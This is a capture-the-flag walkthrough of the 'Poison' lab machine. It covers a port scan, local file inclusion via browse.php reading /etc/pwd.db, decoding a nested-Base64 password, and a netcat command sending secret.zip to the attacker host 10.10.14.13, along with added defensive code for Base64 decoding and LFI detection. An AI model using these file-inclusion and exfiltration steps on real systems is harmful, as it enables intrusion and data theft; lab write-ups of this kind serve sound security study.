This is another one I intend to “rewrite”, but posting here so I can get to work on it later this week.
Run NMAP: root@kali:~# nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.84
This type of nmap scan prints verbose output, runs stealth syn scan, T4 timing (quicker), OS and version detection + full port range scan.
The results of this scan indicate only 1 open port, and ALL other ports are closed. The open port is:
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
It’s a web server, so let’s visit the webpage.
It leads us to a “temporary website” that someone has created to test local .php scripts.
My initial instinct is to try all of these scripts and see what sticks out…
info.php:
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017
root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
listfiles.php:
Array ( [0] => .[1] => .. [2] => browse.php [3] => index.php [4] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] pwdbackup.txt )
So, this shows some files that aren’t listed on the front page. Especially interesting is pwdbackup.txt.
Phpinfo.php is the build information for PHP Version 5.6.32.
I want to look further at pwdbackup.txt. I enter that into the scriptname field and get the following output:
What could go wrong, indeed!
I ran this through a Base64 decoder 13 times, and received the password Charix!2#4%6&8(0. I’m assuming Charix is the username, and step 5 will confirm that.
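Peeling 13 layers by hand in a web decoder works, but it is error-prone and you never quite know when to stop. The snippet below is an added example written for this writeup (not something from the box or from the Poison author): it keeps decoding while the data still looks like Base64 and stops as soon as a layer would produce non-printable bytes, which is also the check that catches a plaintext password that happens to be valid Base64 on its own. The sample secret and the 13-layer wrapping are constructed here to stand in for pwdbackup.txt.

```python
import base64
import binascii
import re
from typing import Tuple

# After whitespace is removed, a Base64 layer is only this alphabet plus padding.
B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def looks_printable(data: bytes) -> bool:
    """True if every byte is printable ASCII or ordinary whitespace."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_base64(blob: bytes, max_layers: int = 32) -> Tuple[bytes, int]:
    """Repeatedly Base64-decode `blob` and return (innermost data, layers removed).

    A layer is only accepted if the encoded form is well-formed Base64 AND the
    decoded bytes are printable; otherwise the previous result is returned.
    max_layers guards against a pathological file that never stops decoding.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        stripped = b"".join(current.split())  # backup files wrap lines at 76 chars
        if not stripped or len(stripped) % 4 or not B64_ALPHABET.match(stripped):
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            break
        if not looks_printable(decoded):
            break  # this "layer" was really plaintext that happened to look like Base64
        current = decoded
        layers += 1
    return current, layers


def wrap_layers(secret: bytes, n: int) -> bytes:
    """Constructed helper: encode `secret` n times, line-wrapped like a text backup."""
    data = secret
    for _ in range(n):
        data = base64.encodebytes(data)
    return data


if __name__ == "__main__":
    # Constructed placeholder, not the real password from the box.
    sample = wrap_layers(b"Tmp-Passw0rd!Example", 13)
    plaintext, depth = peel_base64(sample)
    print(depth, plaintext.decode())  # -> 13 Tmp-Passw0rd!Example
```

To use it on the real file, read pwdbackup.txt as bytes and pass it to peel_base64; the second return value tells you how many layers were in it, which is a useful detail to record in the writeup instead of "x 13 times".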
Entered password, cat user.txt, done.
I also noticed that this web address seems vulnerable to a local file inclusion (LFI) vulnerability. Use of file= suggests I can probably try to access files other than just those listed. I know the OS is FreeBSD, and a quick Google search turns up that the passwd file in FreeBSD is actually in /etc/pwd.db, not /etc/passwd. I try a few variations of ../../etc/pwd.db but it turns out that all I need to access this file is “file=/etc/pwd.db”
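The reason “file=/etc/pwd.db” works with no traversal at all is that browse.php passes the parameter straight to an include with no allow-list and no check that the path stays under the web root. The code below is an added example for this writeup, not the box’s own browse.php: it shows the two checks that would have closed the hole (an allow-list of the scripts the test page actually offers, plus a normalised-path check against an assumed web root) and a small detector that runs over constructed Apache log lines to flag the kind of file= values used above. The web root path and the log lines are assumptions made up for the example.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Scripts the "temporary website" actually links to (from the page's listing).
ALLOWED_SCRIPTS = {"index.php", "browse.php", "info.php", "ini.php", "listfiles.php", "phpinfo.php"}
WEB_ROOT = "/usr/local/www/apache24/data"  # assumed FreeBSD/Apache path, not from the box


def resolve_include(file_param: str) -> Optional[str]:
    """Return the filesystem path the server may include, or None to refuse.

    Two independent checks: the name must be on the allow-list, and the
    normalised path must still sit under WEB_ROOT (defence in depth against
    anything that slips past the allow-list, e.g. a future wildcard entry).
    """
    if file_param not in ALLOWED_SCRIPTS:
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, file_param))
    if not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


# Absolute paths or any ".." segment in the requested file name.
SUSPICIOUS = re.compile(r"(^/|(^|/)\.\.(/|$))")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_lfi_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, file_value) for every request whose file= value is
    absolute, traverses, or names a script not on the allow-list."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group(1)).query)  # parse_qs already URL-decodes
        for value in query.get("file", []):
            if SUSPICIOUS.search(value) or value not in ALLOWED_SCRIPTS:
                hits.append((line.split()[0], value))
    return hits


# Constructed Apache combined-log lines modelled on the requests made in this writeup.
SAMPLE_LOG = [
    '10.10.14.13 - - [21/Mar/2018:10:00:01 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 512',
    '10.10.14.13 - - [21/Mar/2018:10:00:07 +0000] "GET /browse.php?file=/etc/pwd.db HTTP/1.1" 200 40960',
    '10.10.14.13 - - [21/Mar/2018:10:00:12 +0000] "GET /browse.php?file=../../etc/pwd.db HTTP/1.1" 200 40960',
    '10.10.14.13 - - [21/Mar/2018:10:00:20 +0000] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(resolve_include("info.php"))        # -> /usr/local/www/apache24/data/info.php
    print(resolve_include("/etc/pwd.db"))     # -> None
    for ip, value in flag_lfi_requests(SAMPLE_LOG):
        print(f"{ip} requested file={value}")
```

Note that pwdbackup.txt is flagged as well even though it contains no traversal: the allow-list is what turns “a file that exists under the web root but was never meant to be served” into a detectable event, which is exactly how this box was opened.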
There is also a secret.zip file on the desktop that is password protected. I need to transfer it to my attack machine in order to crack it.
On my attack machine:
nc -l -p 1234 > secret.zip to create a file for it to dump into.
On the victim machine:
nc -w 3 10.10.14.13 1234 < secret.zip
I’m going to attempt to crack the password with fcrackzip.
Secret.zip doesn’t have a crazy password to crack. Just use Charix’s password.
VNC is running on the server
SSH tunnelling to connect:
root@Kali:~# ssh -L 5901:localhost:5901 charix@10.10.10.84
Using the VNC GUI doesn’t work, use (in another terminal):
root@Kali:~# vncviewer 127.0.0.1:5901 -passwd /root/Desktop/htb/poison/secret
5902 would have been Charix’s desktop. Poison:2 suggests that. 5901 would be the other VNC running, which is root.